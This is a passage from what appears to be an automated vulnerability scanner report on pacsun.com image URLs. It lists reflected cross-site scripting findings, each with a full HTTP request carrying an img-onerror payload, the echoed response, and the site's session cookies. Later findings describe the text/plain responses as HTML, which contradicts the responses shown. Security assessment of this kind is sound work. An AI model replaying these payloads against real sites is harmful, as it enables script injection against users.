Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:30 GMT
Connection: close

Unable to find /pacsun/headerEmailV3_envelope1b809<img src=a onerror=alert(1)>7f5d0e54d25

5.20. http://images3.pacsun.com/is/image/pacsun/homePromo1_051211 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/homePromo1_051211

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload 70522<img%20src%3da%20onerror%3dalert(1)>1618e1c19ba was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as 70522<img src=a onerror=alert(1)>1618e1c19ba.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/homePromo1_05121170522<img%20src%3da%20onerror%3dalert(1)>1618e1c19ba?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:03 GMT
Connection: close

Unable to find /pacsun/homePromo1_05121170522<img src=a onerror=alert(1)>1618e1c19ba

5.21. http://images3.pacsun.com/is/image/pacsun/homePromo2_051311 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/homePromo2_051311

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload 1f149<img%20src%3da%20onerror%3dalert(1)>9fdfccbd9ba was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as 1f149<img src=a onerror=alert(1)>9fdfccbd9ba.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/homePromo2_0513111f149<img%20src%3da%20onerror%3dalert(1)>9fdfccbd9ba?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; c_m=undefinedDirect%20LoadDirect%20Load; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; s_cc=true; s_cm=1; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; fsr.a=1305510865083

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:05 GMT
Connection: close

Unable to find /pacsun/homePromo2_0513111f149<img src=a onerror=alert(1)>9fdfccbd9ba

5.22. http://images3.pacsun.com/is/image/pacsun/logo_v3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/logo_v3

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload b5c82<img%20src%3da%20onerror%3dalert(1)>685bea3b981 was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as b5c82<img src=a onerror=alert(1)>685bea3b981.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/logo_v3b5c82<img%20src%3da%20onerror%3dalert(1)>685bea3b981?$img_png-alpha$&$ext=.png HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 74
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:29 GMT
Connection: close

Unable to find /pacsun/logo_v3b5c82<img src=a onerror=alert(1)>685bea3b981

5.23. http://images3.pacsun.com/is/image/pacsun/mainNav2_arrivals3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_arrivals3Off

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload abe3a<img%20src%3da%20onerror%3dalert(1)>af65108d6c1 was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as abe3a<img src=a onerror=alert(1)>af65108d6c1.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/mainNav2_arrivals3Offabe3a<img%20src%3da%20onerror%3dalert(1)>af65108d6c1?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:41 GMT
Connection: close

Unable to find /pacsun/mainNav2_arrivals3Offabe3a<img src=a onerror=alert(1)>af65108d6c1

5.24. http://images3.pacsun.com/is/image/pacsun/mainNav2_brands3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_brands3Off

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload a896f<img%20src%3da%20onerror%3dalert(1)>e95d4b07ad3 was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as a896f<img src=a onerror=alert(1)>e95d4b07ad3.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/mainNav2_brands3Offa896f<img%20src%3da%20onerror%3dalert(1)>e95d4b07ad3?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 86
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:49 GMT
Connection: close

Unable to find /pacsun/mainNav2_brands3Offa896f<img src=a onerror=alert(1)>e95d4b07ad3

5.25. http://images3.pacsun.com/is/image/pacsun/mainNav2_collective3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_collective3Off

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload 9308e<img%20src%3da%20onerror%3dalert(1)>4e797c2cb8e was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as 9308e<img src=a onerror=alert(1)>4e797c2cb8e.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/mainNav2_collective3Off9308e<img%20src%3da%20onerror%3dalert(1)>4e797c2cb8e?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 90
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:09 GMT
Connection: close

Unable to find /pacsun/mainNav2_collective3Off9308e<img src=a onerror=alert(1)>4e797c2cb8e

5.26. http://images3.pacsun.com/is/image/pacsun/mainNav2_mens3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_mens3Off

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload 215c2<img%20src%3da%20onerror%3dalert(1)>dc39dea2f35 was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as 215c2<img src=a onerror=alert(1)>dc39dea2f35.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/mainNav2_mens3Off215c2<img%20src%3da%20onerror%3dalert(1)>dc39dea2f35?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:34 GMT
Connection: close

Unable to find /pacsun/mainNav2_mens3Off215c2<img src=a onerror=alert(1)>dc39dea2f35

5.27. http://images3.pacsun.com/is/image/pacsun/mainNav2_sale3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_sale3Off

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload 1312d<img%20src%3da%20onerror%3dalert(1)>4d44989ac33 was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as 1312d<img src=a onerror=alert(1)>4d44989ac33.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/mainNav2_sale3Off1312d<img%20src%3da%20onerror%3dalert(1)>4d44989ac33?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:42 GMT
Connection: close

Unable to find /pacsun/mainNav2_sale3Off1312d<img src=a onerror=alert(1)>4d44989ac33

5.28. http://images3.pacsun.com/is/image/pacsun/mainNav2_shoes3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_shoes3Off

Issue detail

The value of REST URL parameter 4 (the image name that follows /is/image/pacsun/) is copied unencoded into the body of the 403 error response. The payload 70c59<img%20src%3da%20onerror%3dalert(1)>6492a3bd5c9 was submitted in REST URL parameter 4 and was echoed back, URL-decoded but not HTML-encoded, as 70c59<img src=a onerror=alert(1)>6492a3bd5c9.

The echoed markup uses an img onerror event handler and would run arbitrary JavaScript in the origin of images3.pacsun.com if the browser rendered the body as HTML. The response below is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type displays the payload inertly; execution depends on the client sniffing the body as HTML. The reflection itself is certain; the High severity rating assumes such a client.

Request

GET /is/image/pacsun/mainNav2_shoes3Off70c59<img%20src%3da%20onerror%3dalert(1)>6492a3bd5c9?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:31 GMT
Connection: close

Unable to find /pacsun/mainNav2_shoes3Off70c59<img src=a onerror=alert(1)>6492a3bd5c9

5.29. http://images3.pacsun.com/is/image/pacsun/mainNav2_surf3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_surf3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ae557<img%20src%3da%20onerror%3dalert(1)>aec779990ce was submitted in the REST URL parameter 4. This input was echoed as ae557<img src=a onerror=alert(1)>aec779990ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_surf3Offae557<img%20src%3da%20onerror%3dalert(1)>aec779990ce?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:25 GMT
Connection: close

Unable to find /pacsun/mainNav2_surf3Offae557<img src=a onerror=alert(1)>aec779990ce

5.30. http://images3.pacsun.com/is/image/pacsun/mainNav2_swim3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_swim3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c95c0<img%20src%3da%20onerror%3dalert(1)>8c10e31f2ec was submitted in the REST URL parameter 4. This input was echoed as c95c0<img src=a onerror=alert(1)>8c10e31f2ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_swim3Offc95c0<img%20src%3da%20onerror%3dalert(1)>8c10e31f2ec?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:37 GMT
Connection: close

Unable to find /pacsun/mainNav2_swim3Offc95c0<img src=a onerror=alert(1)>8c10e31f2ec

5.31. http://images3.pacsun.com/is/image/pacsun/mainNav2_womens3Off [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/mainNav2_womens3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f9702<img%20src%3da%20onerror%3dalert(1)>08c67d0bd9c was submitted in the REST URL parameter 4. This input was echoed as f9702<img src=a onerror=alert(1)>08c67d0bd9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_womens3Offf9702<img%20src%3da%20onerror%3dalert(1)>08c67d0bd9c?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 86
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:34 GMT
Connection: close

Unable to find /pacsun/mainNav2_womens3Offf9702<img src=a onerror=alert(1)>08c67d0bd9c

5.32. http://images3.pacsun.com/is/image/pacsun/newPromo_042811 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/newPromo_042811

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e5ba6<img%20src%3da%20onerror%3dalert(1)>f5ab3ce03c0 was submitted in the REST URL parameter 4. This input was echoed as e5ba6<img src=a onerror=alert(1)>f5ab3ce03c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/newPromo_042811e5ba6<img%20src%3da%20onerror%3dalert(1)>f5ab3ce03c0?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
